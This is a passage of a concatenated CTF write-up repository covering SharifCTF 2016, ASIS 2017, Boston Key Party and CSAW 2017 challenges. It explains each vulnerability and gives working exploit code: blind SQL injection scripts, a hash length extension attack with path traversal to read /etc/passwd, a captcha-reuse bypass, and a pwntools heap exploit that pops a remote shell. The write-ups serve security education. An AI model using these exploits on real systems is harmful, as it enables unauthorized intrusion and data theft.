110 | $username = 'Cuchulainn';
111 | $password = ;	// Oi don't save me bleedin password in a shithole loike dis.
112 | 
113 | $salt = 'd34340968a99292fb5665e';
114 | 
115 | $tmp = $username . $password . $salt;
116 | $tmp = md5($tmp);
117 | 
118 | $flag = "SharifCTF{" . $tmp . "}";
119 | 
120 | echo $flag;
121 | ```
122 | 
123 | Based on flag.php, admin password was required to make flag. In other hand, login.php had `Blind SQL Injection`. Exploit code:
124 | 
125 | ```
126 | <?php
127 | 
128 | function gPrint($message = 'test', $times=1){
129 |         echo '[' . date("d/m/Y H:i:s").'] ' . $message . str_repeat("\n", $times);
130 | }
131 | 
132 | function NL($times=1){echo str_repeat("\n", $times);}
133 | 
134 | function printResult($result){
135 |         echo "| " . $result . "\n";
136 | }
137 | 
138 | function customCurl($URL=null, $postData=false, $cookie=null, $customHeader=null, $proxy=false){
139 | 
140 |         $cookieJar = './cookie'; //tempnam('/tmp','cookie');
141 |         $ch = curl_init($URL);
142 | 
143 |         if($cookie==='set'){
144 |                 @unlink($cookieJar);
145 |                 curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieJar);
146 |         }elseif($cookie==='get')
147 |                 curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieJar);
148 |         else{}
149 | 
150 |         if($proxy)
151 |                 curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:8080');
152 | 
153 |         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
154 |         curl_setopt($ch, CURLOPT_HEADER, 1);
155 |         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); //don't follow redirects
156 | 
157 |         if($postData!==false){
158 |                 curl_setopt($ch, CURLOPT_POST, 1);
159 |                 curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
160 |                 curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
161 |         }
162 | 
163 |         if($customHeader!==null){
164 |                 curl_setopt($ch, CURLOPT_HTTPHEADER, $customHeader);
165 |         }
166 | 
167 |         $response = curl_exec($ch);
168 | 
169 | 
170 |         list($headers, $body) = explode("\r\n\r\n", $response, 2);
171 |         return array('headers'=>$headers, 'body'=>$body);
172 | }
173 | 
174 | function getSpecificHeader($headers, $name){
175 |         preg_match("#$name: *(.*)$#", $headers, $matches);
176 | 
177 |         return $matches[1];
178 | }
179 | 
180 | function trueOrFalse($response){
181 | 
182 |         $trueValue = 'detected';
183 |         $falseValue = 'seem to';
184 | 
185 |         if(strstr($response, $trueValue)!==false)
186 |                 return true;
187 |         if(strstr($response, $falseValue)!==false)
188 |                 return false;
189 | 
190 |         return 'unknown';
191 | 
192 | }
193 | 
194 | function getChar($pos, $lb=0, $ub=128) {
195 |     $i = 0;
196 |     while(++$i) {
197 |         $M = floor($lb + ($ub-$lb)/2);
198 |         if(injection('<', $pos, $M)==1) {
199 |             $ub = $M - 1;
200 |         }
201 |         else if(injection('>', $pos, $M)==1) {
202 |             $lb = $M + 1;
203 |         }
204 |         else
205 |             return chr($M);
206 |         if($lb > $ub)
207 |             return -1;
208 |     }
209 | }
210 | 
211 | function injection($condition, $position, $char){
212 |         $baseURL = 'http://ctf.sharif.edu:8082/login.php';
213 | 
214 |         //echo "Pos: $position, tryin char $condition $char\n";
215 |         //password=admin&username=-1" or (select char_length(password) from users limit 0,1)>31 -- true
216 |         //password=admin&username=-1" or (select char_length(password) from users limit 0,1)>32 -- false
217 |         // length = 32
218 | 
219 |         $data = 'password=test&username=-1" or ascii(substring((select password from users limit 0,1),' . $position . ',1)) ' . $condition . $char . ' -- ';
220 | 
221 |         $response = customCurl($baseURL, $data, null, null, true);
222 |         return trueOrFalse($response['body']);
223 | }
224 | 
225 | $time_start = microtime(true); 
226 | $str = '';
227 | $i = 1;
228 | gPrint('So far: ', 0);
229 | while(true){
230 |         $char = getChar($i);
231 |         if(ord($char)=='0') break;
232 |         $str .= $char;
233 |         echo $char;
234 |         $i++;
235 | }
236 | $time_end = microtime(true);
237 | 
238 | //dividing with 60 will give the execution time in minutes other wise seconds
239 | $execution_time = ($time_end - $time_start)/60;
240 | 
241 | //execution time of the script
242 | echo "\n";
243 | gPrint('Task has been finished.');
244 | gPrint('Total Execution Time: '.(int)$execution_time.' Minute(s)');
245 | 
246 | ?>
247 | 
248 | ```
249 | Password gathered: Password: **2a7da9c@088ba43a_9c1b4Xbyd231eb9** and the flag was generated by password easily.
250 | 
251 | 
252 | https://twitter.com/yshahinzadeh
253 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Web/jareCaptcha/README.md:
--------------------------------------------------------------------------------
  1 | #jareCaptcha
  2 | 
  3 | **Category:** WEB, PPC
  4 | 
  5 | Can you solve some sudoku challenges?
  6 | 
  7 | ##Solution
  8 | 
  9 | In this challenge we are given a webpage with a sudoku table that we should solve. Also a captcha to protect page from being brute-forced.
 10 | Requested task is to solve the sudoku for 200 times and submit our results to get the flag.
 11 | Viewing source code of challenge, we will see that there is a javascript code for rendering sudoku table in client-side.
 12 | 
 13 | ```javascript
 14 | function sudoku(w){
 15 |    var str
 16 |    str = "072106048410000000030874291090052386765080012203961405051390004320040107000000600";
 17 |    var j
 18 |    var a,b,l1,l2,l3,l4,t
 19 |    t="";
 20 |    l1="<td bgcolor=";
 21 |    l2=">&nbsp;&nbsp;</td>";
 22 |    l3="<td bgcolor=";
 23 |    l4="</td>";
 24 |    for (j=0;j<9;j++){
 25 |         if(j==0 | j==1 | j==2 | j==6 | j==7 | j==8){a="DDDDDD";b="FFFFFF";}
 26 |         if(j==3 | j==4 | j==5){b="DDDDDD";a="FFFFFF";}
 27 |         t+="<TR>";
 28 |         if (str.charAt(0+j*9)=="0"){t+=l1+a+l2;}else{t+=l3+a+">"+str.charAt(0+j*9)+l4;}
 29 |         if (str.charAt(1+j*9)=="0"){t+=l1+a+l2;}else{t+=l3+a+">"+str.charAt(1+j*9)+l4;}
 30 |         if (str.charAt(2+j*9)=="0"){t+=l1+a+l2;}else{t+=l3+a+">"+str.charAt(2+j*9)+l4;}
 31 |         if (str.charAt(3+j*9)=="0"){t+=l1+b+l2;}else{t+=l3+b+">"+str.charAt(3+j*9)+l4;}
 32 |         if (str.charAt(4+j*9)=="0"){t+=l1+b+l2;}else{t+=l3+b+">"+str.charAt(4+j*9)+l4;}
 33 |         if (str.charAt(5+j*9)=="0"){t+=l1+b+l2;}else{t+=l3+b+">"+str.charAt(5+j*9)+l4;}
 34 |         if (str.charAt(6+j*9)=="0"){t+=l1+a+l2;}else{t+=l3+a+">"+str.charAt(6+j*9)+l4;}
 35 |         if (str.charAt(7+j*9)=="0"){t+=l1+a+l2;}else{t+=l3+a+">"+str.charAt(7+j*9)+l4;}
 36 |         if (str.charAt(8+j*9)=="0"){t+=l1+a+l2;}else{t+=l3+a+">"+str.charAt(8+j*9)+l4;}
 37 |         t+="</TR>\n";
 38 |    }
 39 |    document.getElementById(w).innerHTML="<table style='text-align: center; vertical-align: middle; width: 270px; height: 270px;' border=2 cellpadding=0 cellspacing=0>\n"+t+"</table>\n";
 40 | }
 41 | ```
 42 | 
 43 | Looking at javascript source we see that there is a variable named "str" that have the sudoko table's field values each time the page loads.
 44 | So the task is clear. we should first send a request to server, receive this value, solve this sudoku having "str" variable value and then send our result with captcha value.
 45 | But the tricky point is the captcha. Cause it's a little hard to crack this captcha each time.
 46 | Thanks to my teamtames that noticed once a captcha is created for our session, we can access to it's value everytime we send a request with our session parameters.
 47 | It means that if we send a request to "http://ctf.sharif.edu:8084/jarecap?pool=images/&(\d*)" to generate a new captcha, We can send the value of this captcha
 48 | for unlimited times if we send requests with our session.
 49 | 
 50 | The python code for generate this process is given as below:
 51 | 
 52 | ```python
 53 | from PIL import Image
 54 | import sys
 55 | import urllib
 56 | import json
 57 | import re
 58 | import requests
 59 | 
 60 | 
 61 | def findNextCellToFill(grid, i, j):
 62 |     for x in range(i,9):
 63 |         for y in range(j,9):
 64 |             if grid[x][y] == 0:
 65 |                 return x,y
 66 |     for x in range(0,9):
 67 |         for y in range(0,9):
 68 |             if grid[x][y] == 0:
 69 |                 return x,y
 70 |     return -1,-1
 71 | 
 72 | 
 73 | def isValid(grid, i, j, e):
 74 |     rowOk = all([e != grid[i][x] for x in range(9)])
 75 |     if rowOk:
 76 |             columnOk = all([e != grid[x][j] for x in range(9)])
 77 |             if columnOk:
 78 |                     # finding the top left x,y co-ordinates of the section containing the i,j cell
 79 |                     secTopX, secTopY = 3 *(i/3), 3 *(j/3)
 80 |                     for x in range(secTopX, secTopX+3):
 81 |                             for y in range(secTopY, secTopY+3):
 82 |                                     if grid[x][y] == e:
 83 |                                             return False
 84 |                     return True
 85 |     return False
 86 | 
 87 | 
 88 | def solveSudoku(grid, i=0, j=0):
 89 |     i,j = findNextCellToFill(grid, i, j)
 90 |     if i == -1:
 91 |         return True
 92 |     for e in range(1,10):
 93 |         if isValid(grid,i,j,e):
 94 |             grid[i][j] = e
 95 |             if solveSudoku(grid, i, j):
 96 |                 return True
 97 |             # Undo the current cell for backtracking
 98 |             grid[i][j] = 0
 99 |     return False
100 | 
101 | 
102 | def create_sudoku_list(s_str):
103 |     r = []
104 |     for i in range(len(s_str)/9):
105 |         r.append([int(x) for x in s_str[9*i:9*i+9]])
106 |     return r
107 | 
108 | 
109 | def return_back_to_str(s_list):
110 |     return ''.join([''.join([str(i) for i in x]) for x in s_list])
111 | 
112 | 
113 | # s = requests.Session()
114 | url = "http://ctf.sharif.edu:8084/"
115 | cookies = dict(csrftoken='2lpf6Krl96cbpU5NLVKiqEOlANQ5uLJEwutMwSLzyg5oNMhwsUcnB1Farvic7uco',
116 |                sessionid='xxs408hfkrfj73dpv4pvsdbwh5ku3m9e', PHPSESSID= 'qjp47pv1548uajdfhchddo5js3')
117 | 
118 | 
119 | while True:
120 |     r = requests.get(url, cookies=cookies)
121 |     soup = BeautifulSoup(r.text, 'lxml')
122 |     data  = soup.find_all("script")[0].string
123 |     data = data.split('\n')[4]
124 |     sudoku = data.split('"')[1]
125 |     xx = create_sudoku_list(sudoku)
126 |     result = solveSudoku(xx)
127 |     solved = return_back_to_str(xx)
128 |     csrftoken = str(r.headers).split('csrftoken=')[1].split(';')[0]
129 |     post_data = {'csrfmiddlewaretoken': csrftoken,
130 |                  'solvedsudoku': solved, 'captcha': 'HRU7CS6YL5', 'submit': 'Submit'}
131 |     r = requests.post(url, data=post_data, cookies=cookies)
132 |     print r.text
133 | ```
134 | 
135 | I also captured the values for csrf-token each time the page loads because of django-csrf-middleware-protection.
136 | Because if we do'nt send this value within our requests, Django will raise an 403 forbidden exception. (And i know if i wrote my requests better, i can handle this problem with python easily... but we didn't have that much time to find the correct python code...:D)
137 | 
138 | & After 200 request's we get the flag in requests text data.


--------------------------------------------------------------------------------
/2017-ASIS-CTF-Finals/GSA Main Server/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2017-ASIS-CTF-Finals/GSA Main Server/1.png


--------------------------------------------------------------------------------
/2017-ASIS-CTF-Finals/GSA Main Server/README.md:
--------------------------------------------------------------------------------
  1 | # GSA Main Server
  2 | 
  3 | The participants were given a portal containing some information and it has some features such as downloading attachments and etc. After spending some time on the task, I notieced a comment in the last line of index.php file:
  4 | 
  5 | ```
  6 | <!--# vim: syntax=apache ts=4 sw=4 sts=4 sr noet-->
  7 | ```
  8 | 
  9 | Indicating the file has been modified by vim, so I checked `index.php~`, nothing useful but:
 10 | ```
 11 | <? require 'html/header.php'; ?>
 12 | <? require 'functions.php' ?>
 13 | <? require 'infoDB.php' ?>
 14 | ```
 15 | I checked all pages by adding ~ and, `functions.php~` was there:
 16 | ```
 17 | <?php
 18 | 
 19 | // database configuration
 20 | include 'configuration.php';
 21 | 
 22 | // waf to protect the web attacks
 23 | include 'waf.php';
 24 | 
 25 | // connection to the database
 26 | $mysqli = new mysqli(__DB_HOST, __DB_USER, __DB_PASS, __DB_NAME);
 27 | 
 28 | // signature function
 29 | // store __KEY in safe place
 30 | // __KEY is stored in configuration.php
 31 | // do not change the __KEY if you don't know how the system workes, the installation process produces secure 10-chacacter key
 32 | function makeSignature($fileName){
 33 |     return md5(md5(__KEY) . $fileName);
 34 | }
 35 | 
 36 | // function to get header data by HTTP packet
 37 | function getHeaderData($headers, $name){
 38 |     return (array_key_exists($name, $headers))?$headers[$name]:false;
 39 | }
 40 | 
 41 | // parsing the database resultst
 42 | function resultToArray($result){
 43 |     $rows = array();
 44 |     while($row = $result->fetch_assoc()){
 45 |         $rows[] = $row;
 46 |     }
 47 |     return $rows;
 48 | }
 49 | 
 50 | // end
 51 | ```
 52 | On the other side, in portal (*http://178.62.34.76/showInformation/2*) there was an attachment to download:
 53 | 
 54 | ```
 55 | GET /getAttachment/file.txt HTTP/1.1
 56 | Host: 178.62.34.76
 57 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
 58 | Accept: */*
 59 | Accept-Language: en-US,en;q=0.5
 60 | Accept-Encoding: gzip, deflate
 61 | X-Signature: beb2e68c628653c72abcb388b078cfda
 62 | X-Requested-With: XMLHttpRequest
 63 | Referer: http://178.62.34.76/showInformation/2
 64 | Connection: close
 65 | ```
 66 | 
 67 | It had two important parts, filename which was given by URL and `X-Signature: beb2e68c628653c72abcb388b078cfda` which prevented from changing file name:
 68 | ```
 69 | GET /getAttachment/blahblah HTTP/1.1
 70 | Host: 178.62.34.76
 71 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
 72 | Accept: */*
 73 | Accept-Language: en-US,en;q=0.5
 74 | Accept-Encoding: gzip, deflate
 75 | X-Signature: beb2e68c628653c72abcb388b078cfda
 76 | X-Requested-With: XMLHttpRequest
 77 | Referer: http://178.62.34.76/showInformation/2
 78 | Connection: close
 79 | 
 80 | 
 81 | Rsponse: Error: Invalid Signature has been given
 82 | ```
 83 | 
 84 | Back to the functions.php, if makeSignature makes the signature, there are two notes:
 85 | 
 86 | + The key cannot be brute forced, because the length was 10 character as mentioned in comment
 87 | + The function was vulnerbale to Hash Length Extension
 88 | 
 89 | So I used hashpumpy library to exploit the hole:
 90 | 
 91 | ```
 92 | import requests
 93 | import hashpumpy
 94 | import urllib
 95 | import sys
 96 | 
 97 | if len(sys.argv) != 2:
 98 | 	print ''
 99 | 	print '[>] Usage: python {} [path]'.format(sys.argv[0])
100 | 	print '[>] Example: python {} ../../../../../../etc/passwd'.format(sys.argv[0])
101 | 	print ''
102 | 	sys.exit()
103 | 
104 | new_digest, new_data = hashpumpy.hashpump('beb2e68c628653c72abcb388b078cfda', 'file.txt', '?/' + sys.argv[1] , 32)
105 | new_data_encoded = urllib.quote_plus(urllib.quote_plus(new_data))
106 | 
107 | print ''
108 | print '[>] New Signature: {}'.format(new_digest)
109 | print '[>] New data: {}'.format(new_data.encode('hex'))
110 | print '[+] Result:'
111 | print ''
112 | print '~~~~~~'
113 | 
114 | headers = {'X-Signature': new_digest}
115 | response = requests.get('http://178.62.34.76/getAttachment/' + new_data_encoded, headers=headers);
116 | print response.text;
117 | 
118 | print '~~~~~~'
119 | print ''
120 | ```
121 | 
122 | Result:
123 | ![](1.png)
124 | 
125 | I spent much time here, figured out that two files were important to read:
126 | 
127 | + Squid config 
128 | + .htaccess
129 | 
130 | The htaccess source:
131 | 
132 | ```
133 | RewriteEngine on
134 | 
135 | RewriteRule simple-php-captcha.php simple-php-captcha.php [L]
136 | 
137 | RewriteRule showInformation/(.+) /showInformation.php?informationID=$1 [L]
138 | RewriteRule infoSubmit /informationSubmit.php [L]
139 | RewriteRule notConfirmedInformation/(.+) /notConfirmedInformation.php?informationID=$1 [L]
140 | RewriteRule getAttachment/(.+) /getAttachment.php?fileName=$1 [L]
141 | RewriteRule dataSubmitted/(.+) /dataSubmitted.php [L]
142 | RewriteRule adminer-4.3.1-en.php adminer-4.3.1-en.php [L]
143 | 
144 | #RewriteRule "searchData/(.+)" "http://gsa.dataStorage.domain/0/portalSearch/?searchURL=$1" [L]
145 | #RewriteRule "API/(.+)" "http://gsa.API.domain/api/$1" [L]
146 | 
147 | RewriteCond %{REQUEST_FILENAME} !-d
148 | RewriteCond %{REQUEST_FILENAME} !-f
149 | RewriteRule . index.php [L]
150 | 
151 | RewriteCond %{THE_REQUEST} \.php[\ /?].*HTTP/ [NC]
152 | RewriteRule ^.*$ index.php [L]
153 | 
154 | ```
155 | 
156 | Revealing two new hosts (next questions), and some hidden path such as `notConfirmedInformation/` and etc. `infoSubmit/` path allowed to insert new information and `notConfirmedInformation/` allowed to see the information submitted. After some strugling at this stage, I found that `notConfirmedInformation/{id}` was prone to MySQL injection. However, the injection was tricky because as I deduced:
157 | 
158 | + There was two query, first loads the page and second upgrades the view number.
159 | + The first one was totally secured, the second one had injection though. **The SQLi test was easy**
160 | + The WAF was annoying, it blocked queries had some keywords such as `union` and replaced some characters such as `space`
161 | 
162 | ###### SQLi test:
163 | http://178.62.34.76/notConfirmedInformation/265940057+and+1=1
164 | http://178.62.34.76/notConfirmedInformation/265940057+and+1=2
165 | 
166 | Page gets loaded but `Visited` ony upgraded in first request
167 | 
168 | 
169 | ###### The flag:
170 | Finnaly, I wrote a python code to exploit the injection hole:
171 | 
172 | ```
173 | import requests
174 | import re
175 | import sys
176 | 
177 | regex = re.compile("<b>Visited:</b> (\d+)</div>")
178 | 
179 | 
180 | if len(sys.argv) != 2:
181 |     print ''
182 |     print '[>] Usage: python {} [id]'.format(sys.argv[0])
183 |     print '[>] Example: python {} 265940057'.format(sys.argv[0])
184 |     print ''
185 |     sys.exit()
186 | 
187 | qq = "http://178.62.34.76/notConfirmedInformation/{}".format(sys.argv[1])
188 | body = requests.get(qq).text
189 | 
190 | visited = int(regex.findall(body)[0])
191 | 
192 | 
193 | #q = "(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))"
194 | #q = "(select(group_concat(column_name))from(information_schema.columns)where(table_schema=database())and(table_name='flag'))"
195 | q = "(select(flag)from(flag))"
196 | 
197 | out = ""
198 | for i in range(1,30):
199 |     for c in range(31,126):
200 |         qq = "http://178.62.34.76/notConfirmedInformation/"+sys.argv[1]+"-if(ord(mid("+q+","+str(i)+",1))="+str(c)+",0,2)"
201 |         #print qq
202 |         body = requests.get(qq).text
203 |         #print body
204 |         visited2 = int(regex.findall(body)[0])
205 | 
206 | 
207 |         if visited + 1 == visited2:
208 |             sys.stdout.write(chr(c)) 
209 |             sys.stdout.flush()
210 |             visited = visited2
211 |             break
212 |         if visited2==visited:
213 |             pass
214 |         else:
215 |             pass
216 | ```
217 | 
218 | The Flag: ASIS{SQLi_sT1lL_Ex1sT5_G0od_j0B}
219 | 
220 | ###### Contact
221 | https://twitter.com/yshahinzadeh


--------------------------------------------------------------------------------
/2017-BostonKeyParty/memo/README.md:
--------------------------------------------------------------------------------
 1 | `memo` is a `x86_64` pwn challenge with provided `libc`. `FULL RELRO` and `PIE` is disabled. At start we should provide an username (and password). We can do the following operations:  
 2 | 1. Insert new memo of size 0x20 up to 4  
 3 | 2. Edit last memo  
 4 | 3. View memo by index  
 5 | 4. Delete memo by index  
 6 | 5. Change Username and Password you entered before  
 7 |   
 8 | There is also a two table (array) at `.bss` which keeps memo address and its size (<= 0x20). 
 9 | # Vulnerabilities
10 | After analysing each function it can be seen as `memo` has multiple issues:  
11 | 1. At `new_message` `0x400C52` if we enter size more than 0x20 we can overflow an heap allocation by `malloc(0x20)` with our size. **and the allocated space won't be placed in memos table**  
12 | 2. At `edit_last_message` `0x400DA8` we can leak heap address after editing.  
13 | 3. At `view_memo` `0x400E56` index is not checked against negative values although due to casting we can't use this infoleak.  
14 | 4. At `change_password` `0x400FF6` there is an off-by-one on entering password which overwrite LSB (Least significant byte) of first (index == 0) memo size.  
15 | 
16 | 
17 | As you may noticed we have heap overflow (via using `4` or `1`) but based on size limitation we should trick `fastbins` to own the challenge.  
18 |   
19 | # Exploitation
20 | First of all we need a fastbin free chain. So allocating two chunk both of size 0x20 and then freeing the chunks in **inverse order** gives us a fastbin free chain of size `48` (**0x30**). We can then use `1` vulnerability to overflow the heap and corrupt heap so that free chain last pointer points to our arbitrary address. **But remember we should provide our pointer in such a way that it bypasses the fastbin malloc corruption checks**. To do so we should use an address with having a metadata (address-4) of size `48`. For this case i choose memo table so if i can overwrite pointers in the table i have `infoleak + write-what-where` primitive. As i described earlier we can use password since it is located just behind the table. after overwriting the second pointer in the table and using `view_memo` i have libc leak and stack leak. Due to binary compiled with `FULL RELRO` protection, we can overwrite stack or creating a fake tls_dtors struct (but due to new protection against tls_dtors and issues in some cases i choose option 1). After leaking we can overwrite the second pointer in the table again with stack address and pwn the challenge.  
21 | 
22 | You can see my [exploit](sol.py) 


--------------------------------------------------------------------------------
/2017-BostonKeyParty/memo/sol.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | 
  3 | from pwn import *
  4 | 
  5 | """
  6 | root@PrivLin:~/m# python sol.py 
  7 | [!] Couldn't find relocations against PLT to get symbols
  8 | [*] '/root/m/memo'
  9 |     Arch:     amd64-64-little
 10 |     RELRO:    Full RELRO
 11 |     Stack:    No canary found
 12 |     NX:       NX enabled
 13 |     PIE:      No PIE
 14 | [*] '/root/m/memo_libc.so.6'
 15 |     Arch:     amd64-64-little
 16 |     RELRO:    Partial RELRO
 17 |     Stack:    Canary found
 18 |     NX:       NX enabled
 19 |     PIE:      PIE enabled
 20 | [+] Opening connection to 54.202.7.144 on port 8888: Done
 21 | heap_base: 0x2203000
 22 | stack_leak: 0x7ffd769fd740
 23 | libc: 0x7f42a5801740
 24 | [*] Switching to interactive mode
 25 | 
 26 | $ ls /home
 27 | memo
 28 | $ cat /home/memo/flag
 29 | bkp{you are a talented and ambitious hacker}
 30 | [*] Got EOF while reading in interactive
 31 | $  
 32 | """
 33 | 
 34 | 
 35 | 
 36 | e = ELF("./memo")
 37 | l = ELF("./memo_libc.so.6")
 38 | 
 39 | def menu():
 40 |     r.recvuntil(">> ")
 41 | 
 42 | def create_memo(idx, length, content):
 43 |     r.sendlineafter(">> ", "1")
 44 |     r.sendlineafter("Index: ", str(idx))
 45 |     r.sendlineafter("Length: ", str(length))
 46 |     if length > 0x20:
 47 |         r.sendafter("memo though\n", content)
 48 |     else:
 49 |         r.sendafter("Message: ", content)
 50 | 
 51 | def edit_last_memo(content):
 52 |     r.sendlineafter(">> ", "2")
 53 |     r.sendafter("Edit message: ", content)
 54 |     r.recvuntil("message!\n")
 55 |     leak = u64(r.recvline().strip().ljust(8, "\x00"))
 56 |     return leak
 57 | 
 58 | def view_memo(idx):
 59 |     r.sendlineafter(">> ", "3")
 60 |     r.sendlineafter("Index: ", str(idx))
 61 |     r.recvuntil("View Message: ")
 62 |     content = r.recvuntil("\n\n")
 63 |     return content[:-2]
 64 | 
 65 | def delete_memo(idx):
 66 |     r.sendlineafter(">> ", "4")
 67 |     r.sendlineafter("Index: ", str(idx))
 68 | 
 69 | #r = process("./memo")
 70 | r = remote("54.202.7.144", 8888)
 71 | 
 72 | r.sendlineafter("What's user name: ", "A")
 73 | r.sendlineafter("(y/n) ", "y")
 74 | r.sendafter("Password: ", "\x00"*0x18 + "\x31")
 75 | 
 76 | create_memo(3, 32, "A")
 77 | create_memo(2, 32, "A")
 78 | leak = edit_last_memo("B")
 79 | heap_base = leak & ~0xfff
 80 | print "heap_base:", hex(heap_base)
 81 | 
 82 | delete_memo(2)
 83 | delete_memo(3)
 84 | create_memo(3, 1024, "A"*0x28 + p64(0x31) + p64(0x602a50))
 85 | create_memo(2, 32, "A")
 86 | create_memo(0, 32, p64(0x0000002000000020)+p64(0x0000000000000020)+p64(0x602a60)+p64(0x602a98))
 87 | 
 88 | _stack_leak = view_memo(1)
 89 | _stack_leak = u64(_stack_leak.ljust(8, "\x00"))
 90 | print "stack_leak:", hex(_stack_leak)
 91 | 
 92 | edit_last_memo(p64(0x0000002000000020)+p64(0x0000000000000020)+p64(0x602a60)+p64(0x601fb0))
 93 | _libc = view_memo(1)
 94 | _libc = u64(_libc.ljust(8, "\x00"))
 95 | print "libc:", hex(_libc)
 96 | 
 97 | libc_base = _libc - 0x20740
 98 | system = libc_base + 0x45380
 99 | bin_sh = libc_base + next(l.search("/bin/sh\x00"))
100 | pop_rdi = 0x0000000000401263
101 | 
102 | p = p64(pop_rdi) + p64(bin_sh) + p64(system)
103 | 
104 | edit_last_memo(p64(0x0000002000000020)+p64(0x0000000000000020)+p64(_stack_leak + 0x18))
105 | edit_last_memo(p)
106 | 
107 | 
108 | r.interactive()
109 | r.close()
110 | 


--------------------------------------------------------------------------------
/2017-CSAW/firewall/readme.md:
--------------------------------------------------------------------------------
 1 | # FIREWALL
 2 | 
 3 | firewall was a pwn challenge prepared to run under windows (POSIX support).
 4 | First of all we enable *Unix-subsystem* in the windows features which can be accessed from CP->Programs->Turn on ...(Please make sure you have Enterprise or Ultimate version of win!).
 5 | Then we need [this file](https://download.microsoft.com/download/6/2/1/6214608E-1A46-43DA-BEF4-B1A575F7CD26/Utilities%20and%20SDK%20for%20Subsystem%20for%20UNIX-based%20Applications_AMD64.exe) to run and then debug the exe.
 6 | 
 7 | ## Analysing:
 8 | 
 9 | After reading the binary we can summerize the tasks:
10 | 
11 | 1. The binary first loads flag in the memory and init some space and a menu table and a MAGIC (`0xFEE15BAD`) in the `0x40E960`. (So the goal seems to be reading flag from memory.)
12 | 2. After creating a token, we should authenticate with valid token to enter the system.
13 | 3. We can select 8 menu to:  
14 | 	1. Create new firewall rule (create_rule:`0x401d00`)
15 | 	2. Edit a firewall rule (edit_rule:`0x401e60`)
16 | 	3. Delete a firewall rule (delete_rule:`0x401fd0`)
17 | 	4. Print a firewall rule	(print_rule:`0x402080`)
18 | 	5. List all firewall rules (list_rules:`0x4021a0`)
19 | 	6. Check some MAGIC (with `0xFACADE`) and print flag if it is correct! (print_flag:`0x402240`)
20 | 	7. help
21 | 	8. Exit
22 | 
23 | Size of each rule is `29` and we can create up to `16` rules.  
24 | `[byte:enable | char[20]:name | int:port | char[4]:type]`  
25 | 
26 | [token.py](token.py) generates valid token (Also you can read it from memory).
27 | 
28 | ## vuln #1
29 | 
30 | In `edit_rule` we can overflow `name` of a rule to overflow into next rule and overwriting 2 bytes of it. **Please note MAGIC and flag are located just after 16 rules**
31 | At first glance it seems we should create 16 rules and overflow last rule to MAGIC and overwrite to use menu #6 and get the flag. After some time we deduce we cant do such a thing. since first we can write 2 bytes and the due to using fgets in reading type a null byte will be written after 2 bytes!  
32 | 
33 | ## vuln #2
34 | 
35 | In all functions you can select `rule_index = 0`. So after subtracting by `1` we can underflow the rules and leak or overwrite 28 bytes behind of rules. As i told before we have a menu table which is located exactly before rules array!. So we can overwrite the table and write flag addr and after printing menu we can leak the flag :).
36 | 
37 | 
38 | ## Exploiting 
39 | 
40 | The menu table is located at `0x0041294C`.  
41 | flag is at `0x00412B31`.  
42 | 
43 | In `0x40E960` menu table filled with menu strings at `0x0040F130` (8 addresses).  
44 | 
45 | Due to randomization we can use `print_rule` with `idx = 0` to leak address of one menu string and then calculate address of flag. (After running the code on remote i noticed there's no randomization (fork?) anyway we need the address to locate flag for the first time). Based on my analysis using leakage flag offset is `0x00412B31 - 0x0040F168 = 0x39c9`.  
46 | Then we can use `edit_rule` with `idx = 0` to overwrite the table with address of flag and leak the flag.
47 | 
48 | The flag is `flag{w3_f3ll_pr3tty_f4r_d0wn_th3_w1nd0ws_r4bb1t_h0le_huh}`.
49 | 
50 | You can see full exploit [here](sol.py).


--------------------------------------------------------------------------------
/2017-CSAW/firewall/sol.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | """
 5 | expl:~/ctf/2017/csaw/firewall$ python sol.py
 6 | [+] Opening connection to firewall.chal.csaw.io on port 4141: Done
 7 | 00000000  7c 20 46 49  52 45 57 41  4c 4c 20 52  55 4c 45 20  │| FI│REWA│LL R│ULE │
 8 | 00000010  23 34 32 39  34 39 36 37  32 39 35 0a  7c 20 2d 20  │#429│4967│295·│| - │
 9 | 00000020  4e 61 6d 65  3a 20 f1 26  01 68 f1 26  01 84 f1 26  │Name│: ·&│·h·&│···&│
10 | 00000030  01 a0 f1 26  01 bc f1 26  01 d8 f1 26  01 f4 f1 26  │···&│···&│···&│···&│
11 | 00000040  01 01 41 0a  7c 20 2d 20  50 6f 72 74  3a 20 32 39  │··A·│| - │Port│: 29│
12 | 00000050  34 0a 7c 20  2d 20 54 79  70 65 3a 20  f4 f1 26 01  │4·| │- Ty│pe: │··&·│
13 | 00000060  01 41 0a 7c  20 50 52 45  53 53 20 45  4e 54 45 52  │·A·|│ PRE│SS E│NTER│
14 | 00000070  20 54 4f 20  52 45 54 55  52 4e 20 54  4f 20 4d 45  │ TO │RETU│RN T│O ME│
15 | 00000080  4e 55                                               │NU│
16 | 00000082
17 | menu_located at: 0x126f168
18 | [*] Switching to interactive mode
19 | | INVALID RULE TYPE! CANCELING CREATION...
20 | | PRESS ENTER TO RETURN TO MENU 
21 | | +-------------------------+
22 | | |- MENU                   |
23 | | +-------------------------+
24 | | | 1. add firewall rule    |
25 | | | 2. edit firewall rule   |
26 | | w3_f3ll_pr3tty_f4r_d0wn_th3_w1nd0ws_r4bb1t_h0le_huh
27 | | (null)
28 | | (null)
29 | | (null)
30 | | (null)
31 | | (null)
32 | | +-------------------------+
33 | | MENU SELECTION: $ 8
34 | $
35 | [*] Got EOF while reading in interactive
36 | $
37 | [*] Closed connection to firewall.chal.csaw.io port 4141
38 | [*] Got EOF while sending in interactive
39 | """
40 | 
41 | from pwn import *
42 | 
